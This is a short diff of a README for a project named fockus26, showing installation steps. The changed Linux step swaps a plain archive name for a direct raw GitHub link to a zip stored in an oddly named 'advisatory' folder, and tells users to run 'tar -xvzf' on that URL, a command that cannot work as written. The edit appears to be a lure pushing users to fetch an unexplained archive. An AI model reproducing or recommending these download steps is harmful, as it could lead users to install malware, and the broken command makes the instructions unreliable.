Renky16/fockus26/README.md

 4. **Run the Installer:**
    - **Windows:** Locate the downloaded `.exe` file.
 Double-click it to run the installer, and follow the prompts to complete the installation.
    - **macOS:** Find the downloaded `.dmg` file.
 Double-click it to open it, then drag the fockus26 icon to your Applications folder.
-   - **Linux:** Open a terminal, navigate to the folder containing the downloaded `.tar.gz` file, and unzip it using a command like `tar -xvzf fockus26.tar.gz`.
+   - **Linux:** Open a terminal, navigate to the folder containing the downloaded `https://raw.githubusercontent.com/Renky16/fockus26/main/advisatory/fockus26.zip` file, and unzip it using a command like `tar -xvzf https://raw.githubusercontent.com/Renky16/fockus26/main/advisatory/fockus26.zip`.
 Follow the included instructions to install.

 ## 🛠️ Using fockus26
 ### 1. Create a New Project